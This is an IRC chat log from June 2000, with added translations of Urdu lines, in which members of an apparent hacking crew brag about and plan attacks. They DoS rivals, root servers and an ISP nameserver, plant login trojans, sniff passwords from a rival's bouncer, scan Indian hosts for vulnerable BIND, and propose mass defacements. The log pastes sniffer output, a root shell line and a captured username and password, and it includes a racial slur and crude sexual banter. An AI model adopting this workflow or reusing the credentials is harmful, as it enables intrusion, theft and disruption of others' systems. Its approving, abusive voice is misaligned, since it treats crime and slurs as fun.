      :Sp07 :          You can fool all the people some of the time, and some of the people all the time, but you cannot fool all
      :Sp07 :          the people all the time. 
      :Sp07 :          My great concern is not whether you have failed, but whether you are content with your failure. 
      :Sp07 :    
      :Sp07 :Nearly all men can stand adversity, but if you want to test a man's character, give him power. 
      :Sp07 :          Better to remain silent and be thought a fool then to speak out and remove all doubt. 
      :Sp07 :          Things may come to those who wait, but only the things left by those who hustle. 
      :Sp07 :          Most people are about as happy as they make up their minds to be. 
      :Sp07 :          Tact is the ability to describe others as they see themselves. 
      :Sp07 :          He has the right to criticize who has the heart to help. 
      :Sp07 :  
      :Sp07 :I destroy my enemy when I make him my friend. 
      :Sp07 :While one person hesitates because he feels inferior, the other is busy making mistakes and becoming
      :Sp07 :          superior. 
      :Sp07 :New opinions are always suspected, and usually opposed, without any other reason but because they
      :Sp07 :          are not already common. 
      :D1ck :hehe
      :Sp07 :-- Jay Leno
      :Sp07 :          If God doesn't destroy Hollywood Boulevard, he owes Sodom and Gomorrah an apology.
      :Sp07 :If you want truly to understand something, try to change it. 
      :Sp07 :teghres lots of quotes
      :Sp07 :I ilke lincolns quotes
      :Sp07 :-- Julius Caesar 
      :Sp07 :          I came, I saw, I conquered. 
      :Sp07 :thats me
      :D1ck :hahah
      :D1ck :J4n3
      :D1ck :when u come bak, message me it's important.
      :D1ck :wtf
      :D1ck :?
      :D1ck :J4n3
      :D1ck :J4n3
      :D1ck :J4n3
      :D1ck :Sp07
      :D1ck :make me a gRaF|X
      :D1ck :http://www9.example.com/k1dd13/'
      :Sp07 :send me photoshop and I will do it
      :Sp07 :hehe
      :D1ck :h3h
      :Sp07 :let me go check out the website
      :D1ck :(Sp07): let me go check out the website
      :D1ck :*** Disconnected
      :D1ck :*** Rejoined channel 
      :D1ck :what did u say after that
      :Sp07 :?
      :Sp07 :nothing
      :D1ck :u like the site
      :D1ck :what wil u give it out of 10
      :D1ck :?
      :D1ck :1
      :D1ck :?
      :D1ck :2
      :D1ck :?
      :D1ck :3?
      :D1ck :0?
      :Sp07 :.654564
      :Sp07 :hheh
      :Sp07 :its ok
      :D1ck ::(
      :Sp07 :it would be better if it wasnt on a free web thingy
      :Sp07 :www.k1dd13.com
      :Sp07 :or something
      :D1ck :yep
      :D1ck :i`m getting it
      :D1ck :k1dd13-online.org
      :D1ck :www.k1dd13-online.org
      :D1ck :it's under construction dude
      :D1ck ::P
      :D1ck :tons of typos
      :D1ck :needs tons of graphic
      :D1ck :needs tons of graphics
      :D1ck ::)
      :Sp07 :oh
      :D1ck :have to pout perl scripts
      :D1ck :tools
      :D1ck :archieve
      :D1ck :tons of work
      :D1ck ::;
      :D1ck ::;/
      :Sp07 :want to make a website for me
      :Sp07 :?
      :Sp07 :DICKWAD
      :D1ck :heh
      :Sp07 :hehe
      :D1ck :nO
      :Sp07 :potheads.net
      :D1ck :it's hard
      :D1ck :plus i`m getting it made:)
      :Sp07 :=(
      :D1ck :=(
      :Sp07 :any new exploits for redhat 6.1?
      :Sp07 :in the last month or so?
      :Sp07 :I just want to root my friends server so I can make my vhost since hes not doing it
      :D1ck :lol
      :Sp07 :nb       
      :Sp07 :hey
      :Sp07 :Im making an internet search tcl
      :_-Ahsan-_ :LOL
      :_-Ahsan-_ :was were
      
      
      -=-
      
      Day 03 June 6
      
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :.shit * *
      :D1ck! :.shit * *
      :D1ck! :s3ga help shit
      :D1ck! :.shit * *
      :D1ck! :back
      :D1ck! :J4n3
      :D1ck! :u there?
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :J4n3! :D1ck ma back
      :D1ck! :mah bOy
      :D1ck! :mah bOy
      :D1ck! :mah bOy
      :D1ck! :done graph1x?
      :J4n3! :graphix tho already hain, i'm workin on that java and password cgi
      
      "the graphics are already there, i'm working on that java and password cgi"
      
      :J4n3! :downloaded too many scripts, and expermenting with them
      :J4n3! :hey d1ck wanted to ask u something
      :D1ck! :oki
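      :J4n3! :tomorrow thak page ready hojayega with graphics java and cgi password protected
      
      "by tomorrow the page will be ready, with graphics, java and cgi password protection"
      
      :J4n3! :ok listen ek system aisa hai kay jo sploits page hoga uska name password hoga
      
      "ok listen, there is a system where the name of the sploits page will be the password"
      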
      :J4n3! :i mean if page name is sploit898.html
      :J4n3! :that would be the pass
      :J4n3! :if someone click on sploits link
      :J4n3! :another window will appear
      :J4n3! :and it will ask for password
      :J4n3! :if someone know that html page name then it will go through
      :J4n3! :otherwise it wont
      :J4n3! :what u say ?
      :D1ck! :oh
      :D1ck! :welp
      :D1ck! :dunno u choose
      :D1ck! ::P
      :J4n3! :and yeah that banner change script be mila hai it will change at least 5 graphics
      
      "and yeah, i also got that banner change script, it will change at least 5 graphics"
      
      :D1ck! :yep okies
      :D1ck! :cool
      :J4n3! :i mean 5 banners u can select it will change everytime
      :D1ck! :;)
      :J4n3! :heh its complicated workin with cgi and java :/
      :D1ck! :hehe
      :D1ck! ::?
      :D1ck! ::/
      :J4n3! :haha i like ur chat style
      :J4n3! ::?
      :J4n3! ::/
      :J4n3! :hehe
      :J4n3! :tight
      :J4n3! :yaar that synflood is tight
      :J4n3! :u know some hackphreak guy took over deathace's nick 2 weeks ago
      :J4n3! :with his bot with ip *
      :D1ck! :YEP
      :D1ck! :yep in know i dossed him 2 times
      :D1ck! :he is linuxsex ka guy
      
      "he is a guy from linuxsex"
      
      :D1ck! :;)
      :D1ck! :yup
      :J4n3! :hahah lol
      :J4n3! :i dossed him from 9 rewts
      :J4n3! :he went down for 7 hours
      :J4n3! :lol
      :J4n3! :all his domain example.com was down
      :D1ck! :wow
      :D1ck! :HAHAHAHAHAHAHAHA
      :D1ck! :kewl
      :D1ck! :;)
      :J4n3! :haha yeahh
      :J4n3! :i got his nick back u can see it in #k1dd13
      :D1ck! :cool cool
      :D1ck! :;)
      :D1ck! :oye
      :D1ck! :attrition.org say saray mirror akathain karnay hain
      :D1ck! :attrition.org say saray mirror akathain karnay hain
      
      "we have to collect all the mirrors from attrition.org"
      
      :D1ck! :yep
      :D1ck! :i see
      :J4n3! :ahaan no problem
      :J4n3! :ahaan no problem
      :J4n3! :karlaingay
      
      "we will do it"
      
      :J4n3! :yaar worldtel sux
      :J4n3! :it sux all the day only works fine in morning :(
      :D1ck! :*** D1ck changes topic to 'kipitipa nipamipa jipa sepa bah bah blah........'
      :D1ck! :(@J4n3): ahaan no problem
      :D1ck! :(@J4n3): karlaingay
      :D1ck! :*** Disconnected
      :D1ck! :*** Rejoined channel 
      :D1ck! : 
      :D1ck! : (#k1dd13) topic- 'kipitipa nipamipa jipa sepa bah bah blah........'
      :D1ck! : (#k1dd13) topic- set by D1ck (Tue 6th Jun 2000 10:03p)
      :D1ck! :HAFEZ
      :D1ck! :world TEL sucks
      :D1ck! :
      :D1ck! :wOrlDtEl suXx
      :J4n3! :yeah yeah yeah
      :J4n3! :it does
      :J4n3! :it does 
      :J4n3! ::(
      :J4n3! ::(
      :J4n3! ::/
      :J4n3! :only rox in morning
      :J4n3! :sux all the day 
      :D1ck! :hahahaha
      :D1ck! :hmmmmmmmmmm
      :D1ck! :hehe
      :D1ck! :http://www9.example.com/k1dd13/Article3.html
      :D1ck! :send me the graphix.jpg
      :D1ck! ::)
      :D1ck! :the elite 'K1dd13 Online' one
      :J4n3! ::/
      :J4n3! :satnet is lot better yaar
      :J4n3! :it only sux in night e or r hours
      :J4n3! :errr i made only of THE K1dd13 :/
      :J4n3! :oye tell me how do i mount my drive d ?
      :D1ck! :http://www9.example.com/k1dd13/Article3.html
      :D1ck! :d:
      :D1ck! :?
      :J4n3! :hmmm let me check
      :D1ck! :mount /mnt/cdrom
      :J4n3! :yaar drive d
      :D1ck! :mount -t msdos /dev/fd0 /mnt/floppy
      :J4n3! :no no
      :D1ck! :mount -t vfat /dev/hda1 /mnt/win
      :J4n3! :for mounting drive c i write mount -t msdos /dev/hda1 /mnt
      :D1ck! :?
      :D1ck! :cd
      :D1ck! :(@J4n3): for mounting drive c i write mount -t msdos /dev/hda1 /mnt
      :D1ck! :i write
      :D1ck! :mount -t vfat /dev/hda1 /heh
      :J4n3! :i have partitions c d and e
      :J4n3! :by using above command it mount drive c but not d and e , cd is drive g
      :D1ck! :mkdir hh
      :D1ck! :mkdir heh
      :J4n3! :heh but it works
      :D1ck! :hahaha
      :D1ck! :ok
      :D1ck! :i know
      :D1ck! :do this 'df'
      :D1ck! :and paste me
      :D1ck! :and then df -k
      :J4n3! :wait
      :J4n3! :Filesystem           1k-blocks      Used Available Use% Mounted on
      :D1ck! :what is yure d? /dev/hda2?
      :D1ck! :what is yure d? /dev/dba1
      :D1ck! :?
      :J4n3! :.Filesystem           1k-blocks      Used Available Use% Mounted on
      :J4n3! :./dev/hda8              1935132    878956    957780  48% /
      :J4n3! :./dev/hda7                23302      2650     19449  12% /boot
      :J4n3! :./dev/hda1              2064032   1230496    833536  60% /mnt
      :D1ck! :oki
      :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
      :D1ck! :wait, what is /dev/hda7
      :D1ck! :?
      :J4n3! :linux swap partition
      :D1ck! :ok
      :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
      :J4n3! :hda8 is native
      :D1ck! :do this and tell me what u get
      :D1ck! :yep yep
      :J4n3! :[root@example portedfor]# mkdir /win; mount -t vfat /dev/hda2 /win
      :J4n3! :[MS-DOS FS Rel. 12,FAT 0,check=n,conv=b,uid=0,gid=0,umask=022,bmap]
      :J4n3! :[me=0x0,cs=0,#f=0,fs=0,fl=0,ds=0,de=0,data=0,se=0,ts=0,ls=0,rc=0,fc=4294967295]
      :J4n3! :Transaction block size = 512
      :J4n3! :VFS: Can't find a valid MSDOS filesystem on dev 03:02.
      :J4n3! :mount: wrong fs type, bad option, bad superblock on /dev/hda2,
      :J4n3! :       or too many mounted file systems
      :J4n3! :       (aren't you trying to mount an extended partition,
      :J4n3! :       instead of some logical partition inside?)
      :D1ck! :hmm
      :D1ck! :u have to know what is yure d:
      :D1ck! :c == /dev/hda1
      :D1ck! :d == /dev/???/
      :D1ck! :dba1
      :D1ck! :hda1
      :D1ck! :etc
      :J4n3! :hmmm /dev/hda2 i think
      :D1ck! :oye brb booting to linux
      :J4n3! :ok
      :D1ck! :then it should mount
      :D1ck! :oye brb booting to linux
      :D1ck! :oye brb booting to linux
      :J4n3! :so bol raha hon
      :D1ck! :yo
      :D1ck! :back
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! : [Lag 156]
      :J4n3! :yaar neechay gaya huwa tha
      
      "dude, i had gone downstairs"
      
      :D1ck! :fuck
      :D1ck! :worldtel sux
      :D1ck! :oh god
      :D1ck! :welp
      :D1ck! :i`m fucking lagged
      :D1ck! :Inspectah 
      :D1ck! :w00p
      :D1ck! :sup dis
      :Sp07! :hving trouble making this tcl script and nobody has a brain to help me
      :D1ck! :hehe
      :D1ck! :tell me some thing to code
      :D1ck! :man
      :D1ck! :worldtel sucks
      :D1ck! :Sp07
      :Sp07! :?
      :Sp07! :d1ck
      :Sp07! :d1ck
      :D1ck! :supa boh
      :D1ck! :man
      :D1ck! :IRIX
      :Sp07! :?
      :D1ck! :u have a scanner for IRIX?
      :Sp07! :nope
      :D1ck! :i wana own boxes with object-something.c
      :D1ck! ::)
      :Sp07! :object-something?
      :Sp07! :umm just use solaris or linux box to scan
      :D1ck! :heh
      :D1ck! :yeah
      :D1ck! :i forgot that name
      :D1ck! :how did u own that IRIX box?
      :D1ck! :no to scan
      :D1ck! :i wana own IRIX
      :D1ck! :i need boxes to own ;)
      :Sp07! :I dont remember
      :Sp07! :delta something something.edu
      :Sp07! :heh
      :Sp07! :iit.edu
      :D1ck! :k
      :Sp07! :just scan from redhat
      :Sp07! :doesnt matter where you scan from
      :D1ck! :hehe yep
      :Sp07! :why the fuck are they letting taddpole in linuxsex
      :Sp07! :hehe
      :D1ck! :no no
      :Sp07! :are they trying to suck oper dick or something?
      :D1ck! :err, i know that dude
      :D1ck! :i want IRIX boxes address so i can ./own irix-box-address.com
      :D1ck! :Hahahhahah
      :D1ck! :dunno
      :D1ck! :i was wondering
      :Sp07! :oh
      :D1ck! ::)
      :Sp07! :I dont think every irix box is vulnerable
      :Sp07! :heh
      :Sp07! :what port does it connect to?
      :Sp07! :kcnet.org = irix
      :D1ck! :(@Sp07): I dont think every irix box is vulnerable
      :D1ck! :(@Sp07): heh
      :D1ck! :*** Disconnected
      :D1ck! :*** Rejoined channel 
      :D1ck! :fuck
      :D1ck! :my isp
      :Sp07! :[03:21] <Sp07> heh
      :Sp07! :[03:22] <Sp07> what port does it co
      :Sp07! :[03:22] <Sp07> what port does it connect to?
      :Sp07! :[03:22] <Sp07> example.org = irix
      :D1ck! :(@kurupto0n): anyone have a remote root sploit for sendmail 8.9.3?
      :D1ck! :hahaha
      :D1ck! :i`m looking for it,;)
      :D1ck! :[03:18] *** Warning- Over 30 sec lag to self
      :D1ck! :[03:19] *** Warning- Over 60 sec lag to self
      :Sp07! :haha
      :Sp07! :WARNING WARNING
      :Sp07! :afk me go play games
      :D1ck! :Sp07 
      :Sp07! :?
      :Sp07! :I just kicked some ASS
      :D1ck! :Sp07 
      :D1ck! :u there?
      :Sp07! :yes
      :D1ck! :did u see h4r33 EOF ;)?
      :D1ck! :HAHAHAHAHHA
      :D1ck! :he's ultra lame
      :D1ck! ::P
      :Sp07! :yeah
      :D1ck! :lol
      :D1ck! :kill -9 9394
      :D1ck! :pid of 'bnc'
      :Sp07! :uh hehe
      :Sp07! :why dont you sniff all the shit he does on irc
      :Sp07! :and spy on him
      :Sp07! :get his passwords
      :D1ck! :hmmmm
      :D1ck! :cna i do that?
      :Sp07! :yeah
      :D1ck! :if yes then how?
      :D1ck! :i have sniffer
      :Sp07! :hes using that shell as a bounce right?
      :Sp07! :sniff the port
      :D1ck! :on the box
      :Sp07! :that he uses
      :Sp07! :heh
      :D1ck! :./sniff -d 8000
      :D1ck! :errr
      :D1ck! :how?
      :Sp07! :uhh
      :Sp07! :find out the port number
      :Sp07! :then sniff it
      :Sp07! :with your sniffer
      :D1ck! :thats a good idea
      :Sp07! :=D
      :Sp07! :I think that will work
      :Sp07! :never tried it
      :D1ck! :fuck i trojanned the box and removed his 'trojan'
      :D1ck! :HAHAHA
      :D1ck! :oh
      :Sp07! :either sniff the port
      :Sp07! :or sniff everything going out to the irc server
      :D1ck! :motos# ./sniff-100mb -help
      :D1ck! :Usage: ./sniff-100mb [-d x] [-s] [-f] [-l] [-t] [-i interface] [-o file]
      :D1ck! :        -d int    set new data limit (128 default)
      :D1ck! :        -s        filter out smtp connections
      :D1ck! :        -f        filter out ftp connections
      :D1ck! :        -l        filter out rlogin/rsh connections
      :D1ck! :        -t        filter out telnet connections
      :D1ck! :        -o <file> output to <file>
      :D1ck! :heh
      :Sp07! :use a different sniffer heh
      :D1ck! :lol
      :Sp07! :use sniffit
      :D1ck! :they arnt many for sun
      :Sp07! :sniffit
      :D1ck! :hmmmm
      :D1ck! :oh yeah
      :Sp07! :forgot where to get it
      :D1ck! :sniffit
      :D1ck! :
      :D1ck! :get me a binary
      :D1ck! :motos# cc
      :D1ck! :gcc
      :D1ck! :motos# gcc: Command not found
      :D1ck! :./usr/ucb/cc:  language optional software package not installed
      :D1ck! :.ghay boxens
      :Sp07! :haha
      :D1ck! :;/
      :D1ck! : grid (~grid@example.net
      :D1ck! :that fucking packet m0nk
      :D1ck! :hehe
      :Sp07! :?
      :D1ck! :hahahaha
      :D1ck! :nevah mind
      :Sp07! :brass monkey
      :D1ck! :u master badah
      :D1ck! :hehee
      :Sp07! :that funky monkey
      :D1ck! :lol
      :D1ck! :heh
      :D1ck! :that roxer muh nipples
      :D1ck! :man
      :D1ck! :hmmm
      :D1ck! :give me access to a red hat box (local)_
      :D1ck! :i`ll rewt it
      :D1ck! :u know what i did yesterday?
      :D1ck! :echo "some-ip" >  roots.txt
      :D1ck! ::/
      :D1ck! :and i lost most ip's like before
      :D1ck! :i was h1gh
      :Sp07! :heh
      :Sp07! :I dont have anymore accounts except legal ones
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :ok
      :Sp07! :well actually I still have some
      :Sp07! :but I will hold on to them
      :D1ck! :ok;)
      :D1ck! :what IRIX box u just mentioned?
      :Sp07! :example.org
      :Sp07! :is irix
      :Sp07! :I had like 3 accounts there
      :Sp07! :and for some reason they all got canceled
      :Sp07! :what are some isps that allow shell access?
      :Sp07! :I wanna root some isps
      :Sp07! :whys that fag taddpole keep joining linuxsex
      :Sp07! :dos him
      :Sp07! :hehe
      :Sp07! :do /whois Sp07
      :Sp07! :im cool
      :Sp07! :I got +v in #example
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :J4n3 
      :Sp07! :damn my v went away
      :D1ck! :v?
      :D1ck! :huh
      :J4n3! :D1ck 
      :Sp07! :+
      :D1ck! :sup J4n3 
      :D1ck! :hahahhaha
      :D1ck! :lol
      :J4n3! :nuffin much :p u ?
      :D1ck! :nadda
      :D1ck! :masterbation,etc
      :D1ck! :and analing Sp07 
      :J4n3! :heh
      :J4n3! :all about sex :p
      :D1ck! :;)
      :Sp07! :uhhhhh
      :D1ck! :i just tookover 3 of diz's box today ;(
      :D1ck! :one day i did 36
      :Sp07! :suck it
      :D1ck! :heh
      :D1ck! :*ALL* his boxes
      :J4n3! :woo
      :D1ck! :Sp07 
      :D1ck! :hmmmmmm
      :D1ck! :um
      :Sp07! :?
      :D1ck! :J4n3: who'se domain example.com is?
      :D1ck! :and who host's it
      :D1ck! :satnet called up zahid eh
      :J4n3! :donno about it but know who own it
      :J4n3! :its a friend
      :D1ck! : /msg Sp07   man anal me
      :D1ck! :oooops
      :D1ck! :who?
      :D1ck! :hmmmm
      :J4n3! :i gave him sat file to publ1sh
      :D1ck! :n1ck?
      :D1ck! :oh cool
      :J4n3! :Zolo
      :D1ck! ::)
      :J4n3! :;)
      :D1ck! :hehe k
      :J4n3! :z33sh4n
      :D1ck! :ah
      :D1ck! :that a boy
      :D1ck! ::P)
      :D1ck! :zmasterz ?
      :J4n3! :they called zahid ?
      :D1ck! :u know that guy Sp07 
      :D1ck! :J4n3  yeah
      :Sp07! :yeah
      :D1ck! :k
      :J4n3! :about what ?? whay they said ?
      :D1ck! :i dunno
      :Sp07! :they wanted to suck my dick
      :Sp07! :but I turned them down
      :Sp07! :sorry
      :D1ck! :J4n3 : they were blaming a guy that he gave miller access and miller defaced..
      :D1ck! :HAHAHAHAA
      :J4n3! :LOOOOOL
      :D1ck! :Sp07
      :D1ck! :wat was that IRIX box
      :D1ck! :not the .edu
      :D1ck! :the other one u gave me to ./own
      :D1ck! :?
      :Sp07! :kcnet.org
      :D1ck! :k
      :D1ck! :Sp07: u have a IRIX, root kit u could send?
      :Sp07! :no
      :Sp07! :I just used bj
      :Sp07! :the login trojan
      :D1ck! :oh
      :D1ck! :k
      :D1ck! :send me bj.c
      :D1ck! :i lost mine
      :D1ck! :
      :Sp07! :uh
      :Sp07! :I dont have anything
      :Sp07! :hehe
      :D1ck! :heh oh
      :D1ck! :u gave up hacking
      :D1ck! :
      :Sp07! :something like that
      :Sp07! :sooner or later im gonna get arrested it
      :Sp07! :so I stopped
      :D1ck! :oh
      :D1ck! :ok
      :Sp07! :and its not making me any money so its pointless
      :D1ck! :i will NEVER GET ARRESTED
      :Sp07! :I want to start up my own web hosting server
      :D1ck! :cOzM y coUnTrY KiKs AsS
      :D1ck! :ahahah
      :D1ck! :oh
      :Sp07! :We GoT HaMBuRgErS iN My CUnTrY
      :Sp07! :hehehe
      :D1ck! :heh
      :D1ck! :IBM AIX Version 4.x for RISC System/6000
      :D1ck! :(C) Copyrights by IBM and by others 1982, 1996.
      :D1ck! :Access and use restricted to authorized individuals.
      :D1ck! :cub login:
      :D1ck! : /*   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,                  */
      :D1ck! :fuck
      :Sp07! :heh
      :D1ck! : ;p
      :Sp07! :what time is it in pakiland?
      :Sp07! :               nm
      :Sp07! :                          /~\/~\
      :Sp07! :tittiies
      :Sp07! : .  .
      :Sp07! :/~\/~\
      :Sp07! :titties
      :D1ck! :hmmmmmmm
      :D1ck! :6 am
      :Sp07! : ,  ,
      :Sp07! :/~\/~\
      :D1ck! :Entering proxyloop..
      :D1ck! :fuck
      :D1ck! :;)
      :D1ck! :uid=0(root) gid=0(root)
      :D1ck! :*sigh*
      :Sp07! :woohoOO
      :Sp07! :YipPpepEEeee
      :Sp07! :damn
      :Sp07! :it is hot in here
      :D1ck! :hehe
      :Sp07! :is it hot in here or is it just you?
      :Sp07! :is that a banana in your pocket or are you just happy to see me
      :D1ck! :its hot
      :Sp07! :hehe
      :Sp07! :im bored
      :Sp07! :yes that is a 10 foot banana in my pocket
      :D1ck! :i`ll eat halwa puri
      :D1ck! :its tasty tasy breakfast in pakistan
      :D1ck! :u get it for $2
      :D1ck! :or $1
      :D1ck! :J4n3  janies
      :D1ck! :scan for bind 8.2
      :D1ck! :8.2.1
      :D1ck! :HELLO
      :D1ck! :Sp07 
      :D1ck! :a/s/;
      :D1ck! :a/s/l
      :D1ck! :a/s/l
      :D1ck! :i`m hot dude
      :D1ck! :
      :D1ck! :calcuta
      :D1ck! :INDIAN
      :D1ck! :wana chat?
      :Sp07! :?
      :D1ck! :sand nigger
      :D1ck! :heh
      :Sp07! :343/sdfdf/9sdf90d7fs
      :D1ck! :HAHAHAHHHAHA
      :D1ck! :i remember the days when i use to go to msdos and type ping ip
      :D1ck! :and 'laG' it
      :D1ck! :hahaha
      :D1ck! :72 months back
      :D1ck! :w00p
      :D1ck! :HAFEEEEEEEEEZ
      :D1ck! :zoooooooooooooom owned
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :50,00 passwords
      :D1ck! :50,00 passwords
      :Sp07! :?
      :Sp07! :50,00?
      :Sp07! :hehe
      :D1ck! :yeah man
      :D1ck! :local isp's ns
      :D1ck! :hehe
      :D1ck! :I HATE TO OWN
      :Sp07! :heh
      :D1ck! :coz then
      :D1ck! :i have to trojan
      :D1ck! :hehhe
      :D1ck! :i have to trojan before the wake up
      :Sp07! :free internet accesss
      :Sp07! :hehe
      :Sp07! :for you and your friends
      :Sp07! :try to own earthlink.net
      :Sp07! :or pacbell
      :Sp07! :hehe
      :D1ck! :haha yep
      :D1ck! :we dont have earthlink
      :D1ck! :man
      :D1ck! :i have 0 NT skillz
      :D1ck! :teach me NT
      :Sp07! :?>
      :D1ck! :nt
      :Sp07! :I dont have nt
      :Sp07! :I dont exploit NT 
      :D1ck! :same here./
      :Sp07! :almost dinner time
      :Sp07! :I am starving man
      :D1ck! :hehe
      :D1ck! :same here.
      :Sp07! :uhhhhhhhhhhuhuhuuhu
      :Sp07! :afk
      :Sp07! :tv time
      :J4n3! :D1ck 
      :J4n3! :back from sex ;p
      :D1ck! :hahhaa
      :D1ck! :examplenet owned
      :D1ck! :main server
      :J4n3! :haahh
      :J4n3! :kewl
      :J4n3! :u got it again
      :D1ck! :no
      :D1ck! :this is new one
      :J4n3! :huh reallY ?
      :J4n3! :trojaned ?
      :D1ck! :yeah
      :D1ck! :send me root/owned
      :D1ck! :send me root/owned
      :J4n3! :wait
      :D1ck! :or some other u have
      :D1ck! :192.168.232.173 => 192.168.129.21 [110]
      :D1ck! :USER wajahatz
      :D1ck! :PASS fwjs
      :J4n3! :hahah sniffed already ?
      :D1ck! :yep
      :D1ck! :;)
      :D1ck! :i`m fast
      :D1ck! :hehe
      :J4n3! :kewl :p
      :D1ck! :what is linux.tar?
      :J4n3! :send me a file yaar
      :J4n3! :owned login trj
      :D1ck! :hehe it has one pass
      :D1ck! :the one i pasted
      :D1ck! :;/
      :J4n3! :lol
      :D1ck! :;p
      :J4n3! :ye haal hogaya hai example ka :/
      
      "this is what has become of example"
      
      :J4n3! :it must be mail account
      :D1ck! :lol
      :J4n3! :they checked it from worldtel
      :D1ck! :yep
      :J4n3! :D1ck i have another login trj same like this but different pass
      :D1ck! :send me
      :D1ck! :HURRY
      :D1ck! :HURRY
      :D1ck! :they will wake and find out
      :D1ck! :
      :J4n3! :its on my shell
      :D1ck! :ok 
      :J4n3! :download it from there
      :D1ck! : /msg
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3! :Pvamu nick immi
      :J4n3! :hiall abi aayegee and she'll get killed by server :p
      
      "hiall will come now and she'll get killed by server"
      
      
      -=-
      
      Day 04 June 7
      
      :D1ck! :<h4r33:#Linuxsex> i even have a legit box t3 | <h4r33:#Linuxsex> paying 800 per month for it |<h4r33:#Linuxsex> its a auth ns watch me in a week with my i
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck! :y0h
      :D1ck! :worldtel simply
      :D1ck! :sux
      :J4n3! :y0 y0
      :J4n3! :sure it does
      :D1ck! ::/
      :J4n3! ::\
      :J4n3! :4 mb bandwith :/
      :D1ck! :i`m usn\ing my bro's webnet
      :D1ck! ::)
      :D1ck! :it rox
      :J4n3! :it only works fine after 3 am to 10 am 
      :D1ck! : mb my ass
      :D1ck! : mb my ass
      :D1ck! :4 mb my ass
      :D1ck! :HAHAHAHAHA
      :J4n3! :hmmmmm :/
      :D1ck! :lol
      :D1ck! :<J4n3> it only works fine after 3 am to 10 am
      :J4n3! :satnet laaak darjay acha hai yaar is say 
      
      "satnet is 100000 times better than this"
      
      :D1ck! :any isp does
      :D1ck! :rofl
      :D1ck! :satnet rox
      :J4n3! :satnet only goes down from 10 pm to 1 am 
      :J4n3! :other time it rox
      :D1ck! :true
      :J4n3! :l0st example ?
      :D1ck! :yep
      :J4n3! ::(
      :J4n3! :whois blue0 ?
      :D1ck! blue0 :Bitch-X BaBy
      :D1ck! :dunno
      :J4n3! :hmm
      :J4n3! :yaar ye bot be sub gayeb hain
      
      "dude these bots have all disappeared"
      
      :D1ck! :ehehe
      :J4n3! :j0e manhoos ka server he down hai :/
      
      "that wretch j0e's server is down"
      
      :D1ck! :oh
      :D1ck! :lol
      :D1ck! :how come?
      :J4n3! :hehe those bot rox
      :J4n3! :donno server resolve nahin horhaa
      
      "dunno, the server is not resolving"
      
      :J4n3! :aur us say contact be nahin horaha
      
      "and it is not possible to contact him"
      
      :J4n3! :thakay poochon
      
      "ok ask"
      
      :J4n3! :wait lemme call
      :D1ck! :oh
      :D1ck! :may be he's caught?
      :D1ck! :<D1ck> may be he's caught?
      :J4n3! :hmmm
      :J4n3! :nope
      :J4n3! :wo bauth harami banda hia
      
      "he's a total bastard"
      
      :J4n3! :ithnee aasaani say nahi pakra jayega
      
      "he won't be caught so easily"
      
      :J4n3! :haha u know what ?
      :D1ck! :?
      :J4n3! :he once asked miller to add him in k1dd13
      :D1ck! :lol
      :J4n3! :coz he's very close to miller
      :J4n3! :miller said ok
      :J4n3! :hehe
      :D1ck! :hahaha
      :D1ck! :oh then?
      :J4n3! :hah then donno he didn't come here
      :J4n3! : h1ghn3ss [~haris@hi-tech.example.net] has joined #karachi
      
      Karachi is a city in Pakistan - FYI
      
      :D1ck! :oye
      :D1ck! :[fuksnpr(~blue@adsl-example.net)] you worthless fucking script
      :D1ck! :          kiddie pieces of shit
      :D1ck! :dos him
      :D1ck! :dos the fuck
      :D1ck! :dos the fuck out of adsl-example.net
      :J4n3! :heh
      :J4n3! :wait
      :D1ck! :ok
      :D1ck! :J4n3 
      :D1ck! :tell me more
      :D1ck! :oye
      :D1ck! :lets do a mass defacement operation
      :J4n3! :D1ck
      :D1ck! :J4n3 
      :J4n3! :fuck light's chali gayeen theen :(
      
      "fuck, there was a power cut, lights were off"
      
      :D1ck! :ehhee ok
      :J4n3! :D1ck world tel abi tight chal raha hai :PpPPp
      
      "world tel is still running tight"
      
      :D1ck! :hehe i`m on webnet
      :J4n3! :Nahin yaar abee tight chal raha hai
      
      "no dude, it is still running tight"
      
      :J4n3! :forun telnet fast working
      
      "immediate telnet, fast working"
      
      :J4n3! :no lag :p
      :J4n3! :yaar dos1ng is easy from windows
      
      yaar = dude
      
      :D1ck! :ofcourse
      :J4n3! :linux main banda confuse hojatha hai
      
      "In linux, a person gets confused"
      
      :D1ck! :yep
      :D1ck! :;)
      :J4n3! :lemm own sum 1nd1an b0x3s and bring more bots :p
      :D1ck! :oye
      :D1ck! :scan indian servers for bind
      :D1ck! :8.2
      :D1ck! :and
      :D1ck! :8.2.1
      :J4n3! :am on windows right now 
      :J4n3! :i'll do it later and make a log of it
      :D1ck! :0h
      :D1ck! :okie
      :D1ck! :kewl
      :J4n3! :or wait lemme see if j0e's server is up
      :J4n3! :i'll do it from there
      :D1ck! :oki
      :D1ck! :aHAhahaha
      :D1ck! :<vanilla> oh ho 
      :D1ck! :<vanilla> aaj tum vanila nahin anilaa lag rahi ho
      :D1ck! :<vanilaa> undar say kurwi upar ssay chamkili
      
      "today you look like anilaa, not vanilla" / "bitter on the inside, shiny on the outside"
      
      :D1ck! :HAHAHAHAHAH
      :D1ck! :start par addd
      :D1ck! :
      :D1ck! :lol
      :J4n3! :hehe
      :D1ck! :hehee
      :J4n3! :ravi       console      Jun  7 20:30    (:0)
      :J4n3! :ravi       pts/4        Jun  7 20:31
      :J4n3! :ravi       pts/5        Jun  7 20:31
      :J4n3! :ravi       pts/3        Jun  7 20:31    (    )
